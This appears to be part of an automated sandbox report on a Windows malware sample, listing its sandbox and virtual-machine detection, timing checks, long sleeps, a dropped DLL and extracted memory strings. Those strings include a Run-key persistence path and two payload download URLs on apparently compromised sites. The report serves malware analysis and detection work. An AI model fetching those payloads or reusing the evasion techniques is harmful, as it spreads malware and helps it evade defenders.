Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Tries to detect Any.run
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmp Binary or memory string: USER32NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSTARTUP KEYHTTPS://WWW.WIZUMIYA.CO.JP/HTML/USER_DATA/ORIGINAL/IMAGES/BIN_WUOAIR166.BINHTTP://FAHRSCHULE-HELI.AT/BIN_WUOAIR166.BIN
Source: powershell.exe, 00000004.00000002.562061021.00000000074C4000.00000004.00000001.sdmp, ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe RDTSC instruction interceptor: First address: 0000000000639904 second address: 000000000063990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe RDTSC instruction interceptor: First address: 0000000000639B7E second address: 0000000000639B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6644 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\cmstp.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.dll Jump to dropped file
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED46DE6 rdtsc 18_2_1ED46DE6
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2992 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 666 Jump to behavior
Contains capabilities to detect virtual machines
Source: C:\Windows\explorer.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Found large amount of non-executed APIs
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe API coverage: 5.7 %
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe System information queried: ModuleInformation Jump to behavior
Source: explorer.exe, 00000022.00000003.711372871.0000000004AAB000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000016.00000000.534558987.00000000083E7000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: explorer.exe, 00000022.00000003.678164630.0000000005FC7000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000022.00000003.727279202.0000000004D0A000.00000004.00000001.sdmp Binary or memory string: Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: explorer.exe, 00000022.00000003.719709332.00000000049A9000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}j
Source: explorer.exe, 00000022.00000003.711582257.0000000004BF0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000022.00000003.722492029.0000000004CA9000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000022.00000003.719609820.0000000004BF0000.00000004.00000001.sdmp Binary or memory string: en_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Local
Source: powershell.exe, 00000004.00000002.562061021.00000000074C4000.00000004.00000001.sdmp, ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: explorer.exe, 00000022.00000003.726098821.0000000004BB9000.00000004.00000001.sdmp Binary or memory string: #{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&0000004*
Source: powershell.exe, 00000004.00000002.554251303.0000000004776000.00000004.00000001.sdmp Binary or memory string: m:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: explorer.exe, 00000022.00000003.717933251.0000000004BB9000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}gramFiles(x86)=C:\Program FBZ*
Source: explorer.exe, 00000022.00000003.711582257.0000000004BF0000.00000004.00000001.sdmp Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\/
Source: wscript.exe, 00000000.00000003.372188213.00000190E2BBF000.00000004.00000001.sdmp Binary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000022.00000003.709669298.0000000004C50000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f563f-
Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: explorer.exe, 00000022.00000003.717933251.0000000004BB9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000022.00000003.711582257.0000000004BF0000.00000004.00000001.sdmp Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000022.00000000.719680431.00000000060E2000.00000004.00000001.sdmp Binary or memory string: k\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}es
Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: explorer.exe, 00000022.00000003.711582257.0000000004BF0000.00000004.00000001.sdmp Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\_:^
Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: explorer.exe, 00000022.00000003.719054481.00000000049DC000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000PROFILE=C:\Users\userwindir
Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat
Source: explorer.exe, 00000016.00000000.574580825.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: explorer.exe, 00000022.00000003.717933251.0000000004BB9000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Local
Source: explorer.exe, 00000022.00000003.725008203.0000000004D0A000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Br
Source: explorer.exe, 00000022.00000003.717933251.0000000004BB9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00I
Source: explorer.exe, 00000022.00000003.711993399.0000000004C3C000.00000004.00000001.sdmp Binary or memory string: NECVMWarVMware SATA CD001.00
Source: explorer.exe, 00000022.00000003.722492029.0000000004CA9000.00000004.00000001.sdmp Binary or memory string: NECVMWarer
Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: explorer.exe, 00000022.00000003.724427605.0000000004CA0000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: explorer.exe, 00000022.00000000.719680431.00000000060E2000.00000004.00000001.sdmp Binary or memory string: k\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.372188213.00000190E2BBF000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmp Binary or memory string: user32ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=Software\Microsoft\Windows\CurrentVersion\RunStartup keyhttps://www.wizumiya.co.jp/html/user_data/original/images/bin_WUOAiR166.binhttp://fahrschule-heli.at/bin_WUOAiR166.bin
Source: explorer.exe, 00000022.00000003.719709332.00000000049A9000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B-4BFC-
Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: explorer.exe, 00000022.00000003.717933251.0000000004BB9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000022.00000003.725109525.0000000004CAF000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Beu^
Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: explorer.exe, 00000016.00000000.587150869.000000000869A000.00000004.00000001.sdmp Binary or memory string: 700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
Source: explorer.exe, 00000022.00000003.722492029.0000000004CA9000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B:u
